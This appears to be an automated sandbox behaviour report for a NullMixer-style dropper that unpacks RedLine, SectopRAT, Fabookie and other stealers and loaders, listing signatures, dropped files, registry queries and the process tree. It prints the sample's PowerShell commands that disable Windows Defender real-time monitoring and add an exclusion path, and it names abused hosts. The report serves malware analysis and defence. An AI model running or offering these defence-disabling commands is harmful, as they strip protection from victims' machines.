memory/2924-215-0x0000000000400000-0x0000000000422000-memory.dmp

memory/3008-210-0x0000000000400000-0x0000000000422000-memory.dmp

memory/3008-209-0x0000000000400000-0x0000000000422000-memory.dmp

memory/3008-208-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/3008-204-0x0000000000400000-0x0000000000422000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-23 20:56

Reported

2024-11-23 20:58

Platform

win10v2004-20241007-en

Max time kernel

59s

Max time network

122s

Command Line

"C:\Users\Admin\AppData\Local\Temp\544097d6d935fb1fa603b3028499e1923fa7fd5f01ca3f4e95fdcaf9a428fe5f.exe"

Signatures

Detect Fabookie payload

Description Indicator Process Target
N/A N/A N/A N/A

Fabookie

spyware stealer fabookie

Fabookie family

fabookie

GCleaner

loader gcleaner

Gcleaner family

gcleaner

NullMixer

dropper nullmixer

Nullmixer family

nullmixer

OnlyLogger

loader onlylogger

Onlylogger family

onlylogger

PrivateLoader

loader privateloader

Privateloader family

privateloader

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Redline family

redline

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Sectoprat family

sectoprat

OnlyLogger payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8ED2ECA7\Wed224fff3f809a1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8ED2ECA7\Wed224fff3f809a1.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

ASPack v2.12-2.42

aspackv2
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\is-JMRL4.tmp\Wed228eebd341673e072.tmp N/A
Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\7zS8ED2ECA7\Wed22168eb266d7a.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\RuA3KQICsIEnUTi.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\544097d6d935fb1fa603b3028499e1923fa7fd5f01ca3f4e95fdcaf9a428fe5f.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8ED2ECA7\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8ED2ECA7\Wed22293324c9c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8ED2ECA7\Wed2235e1e9c9640.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8ED2ECA7\Wed2255741b48dffd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8ED2ECA7\Wed220fb9dde4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8ED2ECA7\Wed22168eb266d7a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8ED2ECA7\Wed228eebd341673e072.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8ED2ECA7\Wed227d9e0c1976ea6dc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8ED2ECA7\Wed22269ff37e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8ED2ECA7\Wed22d8c4cdc4a5a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8ED2ECA7\Wed22add6199f.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8ED2ECA7\Wed22988be99e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8ED2ECA7\Wed224fff3f809a1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8ED2ECA7\Wed22ac1480b8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-JMRL4.tmp\Wed228eebd341673e072.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8ED2ECA7\Wed228eebd341673e072.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-USGOD.tmp\Wed228eebd341673e072.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8ED2ECA7\Wed22ac1480b8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8ED2ECA7\Wed2255741b48dffd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8ED2ECA7\Wed22add6199f.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RuA3KQICsIEnUTi.exe N/A

Reads user/profile data of web browsers

spyware stealer

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A pastebin.com N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS8ED2ECA7\Wed22d8c4cdc4a5a.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS8ED2ECA7\Wed22add6199f.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS8ED2ECA7\Wed220fb9dde4.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS8ED2ECA7\Wed22168eb266d7a.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS8ED2ECA7\Wed2255741b48dffd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS8ED2ECA7\Wed2235e1e9c9640.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS8ED2ECA7\Wed22988be99e.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS8ED2ECA7\setup_install.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS8ED2ECA7\Wed2255741b48dffd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-JMRL4.tmp\Wed228eebd341673e072.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS8ED2ECA7\Wed22ac1480b8.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS8ED2ECA7\Wed224fff3f809a1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\544097d6d935fb1fa603b3028499e1923fa7fd5f01ca3f4e95fdcaf9a428fe5f.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\RuA3KQICsIEnUTi.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS8ED2ECA7\Wed228eebd341673e072.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS8ED2ECA7\Wed22ac1480b8.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS8ED2ECA7\Wed22269ff37e.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS8ED2ECA7\Wed228eebd341673e072.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-USGOD.tmp\Wed228eebd341673e072.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A

Checks SCSI registry key(s)

Description Indicator Process Target
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zS8ED2ECA7\Wed22988be99e.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zS8ED2ECA7\Wed22988be99e.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zS8ED2ECA7\Wed22988be99e.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8ED2ECA7\Wed227d9e0c1976ea6dc.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8ED2ECA7\Wed224fff3f809a1.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A

Suspicious use of UnmapMainImage

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8ED2ECA7\Wed22add6199f.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1184 wrote to memory of 3560 N/A C:\Users\Admin\AppData\Local\Temp\544097d6d935fb1fa603b3028499e1923fa7fd5f01ca3f4e95fdcaf9a428fe5f.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 1184 wrote to memory of 3560 N/A C:\Users\Admin\AppData\Local\Temp\544097d6d935fb1fa603b3028499e1923fa7fd5f01ca3f4e95fdcaf9a428fe5f.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 1184 wrote to memory of 3560 N/A C:\Users\Admin\AppData\Local\Temp\544097d6d935fb1fa603b3028499e1923fa7fd5f01ca3f4e95fdcaf9a428fe5f.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 3560 wrote to memory of 2332 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS8ED2ECA7\setup_install.exe
PID 3560 wrote to memory of 2332 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS8ED2ECA7\setup_install.exe
PID 3560 wrote to memory of 2332 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS8ED2ECA7\setup_install.exe
PID 2332 wrote to memory of 2924 N/A C:\Users\Admin\AppData\Local\Temp\7zS8ED2ECA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2332 wrote to memory of 2924 N/A C:\Users\Admin\AppData\Local\Temp\7zS8ED2ECA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2332 wrote to memory of 2924 N/A C:\Users\Admin\AppData\Local\Temp\7zS8ED2ECA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2332 wrote to memory of 5000 N/A C:\Users\Admin\AppData\Local\Temp\7zS8ED2ECA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2332 wrote to memory of 5000 N/A C:\Users\Admin\AppData\Local\Temp\7zS8ED2ECA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2332 wrote to memory of 5000 N/A C:\Users\Admin\AppData\Local\Temp\7zS8ED2ECA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2924 wrote to memory of 2376 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2924 wrote to memory of 2376 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2924 wrote to memory of 2376 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 5000 wrote to memory of 2940 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 5000 wrote to memory of 2940 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 5000 wrote to memory of 2940 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2332 wrote to memory of 2440 N/A C:\Users\Admin\AppData\Local\Temp\7zS8ED2ECA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2332 wrote to memory of 2440 N/A C:\Users\Admin\AppData\Local\Temp\7zS8ED2ECA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2332 wrote to memory of 2440 N/A C:\Users\Admin\AppData\Local\Temp\7zS8ED2ECA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2332 wrote to memory of 1000 N/A C:\Users\Admin\AppData\Local\Temp\7zS8ED2ECA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2332 wrote to memory of 1000 N/A C:\Users\Admin\AppData\Local\Temp\7zS8ED2ECA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2332 wrote to memory of 1000 N/A C:\Users\Admin\AppData\Local\Temp\7zS8ED2ECA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2332 wrote to memory of 4092 N/A C:\Users\Admin\AppData\Local\Temp\7zS8ED2ECA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2332 wrote to memory of 4092 N/A C:\Users\Admin\AppData\Local\Temp\7zS8ED2ECA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2332 wrote to memory of 4092 N/A C:\Users\Admin\AppData\Local\Temp\7zS8ED2ECA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2332 wrote to memory of 4624 N/A C:\Users\Admin\AppData\Local\Temp\7zS8ED2ECA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2332 wrote to memory of 4624 N/A C:\Users\Admin\AppData\Local\Temp\7zS8ED2ECA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2332 wrote to memory of 4624 N/A C:\Users\Admin\AppData\Local\Temp\7zS8ED2ECA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2332 wrote to memory of 4560 N/A C:\Users\Admin\AppData\Local\Temp\7zS8ED2ECA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2332 wrote to memory of 4560 N/A C:\Users\Admin\AppData\Local\Temp\7zS8ED2ECA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2332 wrote to memory of 4560 N/A C:\Users\Admin\AppData\Local\Temp\7zS8ED2ECA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2332 wrote to memory of 3384 N/A C:\Users\Admin\AppData\Local\Temp\7zS8ED2ECA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2332 wrote to memory of 3384 N/A C:\Users\Admin\AppData\Local\Temp\7zS8ED2ECA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2332 wrote to memory of 3384 N/A C:\Users\Admin\AppData\Local\Temp\7zS8ED2ECA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2332 wrote to memory of 3572 N/A C:\Users\Admin\AppData\Local\Temp\7zS8ED2ECA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2332 wrote to memory of 3572 N/A C:\Users\Admin\AppData\Local\Temp\7zS8ED2ECA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2332 wrote to memory of 3572 N/A C:\Users\Admin\AppData\Local\Temp\7zS8ED2ECA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2332 wrote to memory of 4932 N/A C:\Users\Admin\AppData\Local\Temp\7zS8ED2ECA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2332 wrote to memory of 4932 N/A C:\Users\Admin\AppData\Local\Temp\7zS8ED2ECA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2332 wrote to memory of 4932 N/A C:\Users\Admin\AppData\Local\Temp\7zS8ED2ECA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2332 wrote to memory of 1624 N/A C:\Users\Admin\AppData\Local\Temp\7zS8ED2ECA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2332 wrote to memory of 1624 N/A C:\Users\Admin\AppData\Local\Temp\7zS8ED2ECA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2332 wrote to memory of 1624 N/A C:\Users\Admin\AppData\Local\Temp\7zS8ED2ECA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2332 wrote to memory of 904 N/A C:\Users\Admin\AppData\Local\Temp\7zS8ED2ECA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2332 wrote to memory of 904 N/A C:\Users\Admin\AppData\Local\Temp\7zS8ED2ECA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2332 wrote to memory of 904 N/A C:\Users\Admin\AppData\Local\Temp\7zS8ED2ECA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2332 wrote to memory of 3744 N/A C:\Users\Admin\AppData\Local\Temp\7zS8ED2ECA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2332 wrote to memory of 3744 N/A C:\Users\Admin\AppData\Local\Temp\7zS8ED2ECA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2332 wrote to memory of 3744 N/A C:\Users\Admin\AppData\Local\Temp\7zS8ED2ECA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2332 wrote to memory of 5072 N/A C:\Users\Admin\AppData\Local\Temp\7zS8ED2ECA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2332 wrote to memory of 5072 N/A C:\Users\Admin\AppData\Local\Temp\7zS8ED2ECA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2332 wrote to memory of 5072 N/A C:\Users\Admin\AppData\Local\Temp\7zS8ED2ECA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2332 wrote to memory of 3936 N/A C:\Users\Admin\AppData\Local\Temp\7zS8ED2ECA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2332 wrote to memory of 3936 N/A C:\Users\Admin\AppData\Local\Temp\7zS8ED2ECA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2332 wrote to memory of 3936 N/A C:\Users\Admin\AppData\Local\Temp\7zS8ED2ECA7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1624 wrote to memory of 2284 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS8ED2ECA7\Wed22293324c9c.exe
PID 1624 wrote to memory of 2284 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS8ED2ECA7\Wed22293324c9c.exe
PID 4932 wrote to memory of 1304 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS8ED2ECA7\Wed2235e1e9c9640.exe
PID 4932 wrote to memory of 1304 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS8ED2ECA7\Wed2235e1e9c9640.exe
PID 4932 wrote to memory of 1304 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS8ED2ECA7\Wed2235e1e9c9640.exe
PID 2440 wrote to memory of 1568 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS8ED2ECA7\Wed2255741b48dffd.exe
PID 2440 wrote to memory of 1568 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS8ED2ECA7\Wed2255741b48dffd.exe

Processes

C:\Users\Admin\AppData\Local\Temp\544097d6d935fb1fa603b3028499e1923fa7fd5f01ca3f4e95fdcaf9a428fe5f.exe

"C:\Users\Admin\AppData\Local\Temp\544097d6d935fb1fa603b3028499e1923fa7fd5f01ca3f4e95fdcaf9a428fe5f.exe"

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe

"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"

C:\Users\Admin\AppData\Local\Temp\7zS8ED2ECA7\setup_install.exe

"C:\Users\Admin\AppData\Local\Temp\7zS8ED2ECA7\setup_install.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed2255741b48dffd.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed22d8c4cdc4a5a.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed22168eb266d7a.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed220fb9dde4.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed22add6199f.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed22988be99e.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed22ac1480b8.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed2235e1e9c9640.exe /mixone

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed22293324c9c.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed224fff3f809a1.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed228eebd341673e072.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed22269ff37e.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed227d9e0c1976ea6dc.exe

C:\Users\Admin\AppData\Local\Temp\7zS8ED2ECA7\Wed22293324c9c.exe

Wed22293324c9c.exe

C:\Users\Admin\AppData\Local\Temp\7zS8ED2ECA7\Wed2235e1e9c9640.exe

Wed2235e1e9c9640.exe /mixone

C:\Users\Admin\AppData\Local\Temp\7zS8ED2ECA7\Wed2255741b48dffd.exe

Wed2255741b48dffd.exe

C:\Users\Admin\AppData\Local\Temp\7zS8ED2ECA7\Wed220fb9dde4.exe

Wed220fb9dde4.exe

C:\Users\Admin\AppData\Local\Temp\7zS8ED2ECA7\Wed22168eb266d7a.exe

Wed22168eb266d7a.exe

C:\Users\Admin\AppData\Local\Temp\7zS8ED2ECA7\Wed228eebd341673e072.exe

Wed228eebd341673e072.exe

C:\Users\Admin\AppData\Local\Temp\7zS8ED2ECA7\Wed227d9e0c1976ea6dc.exe

Wed227d9e0c1976ea6dc.exe

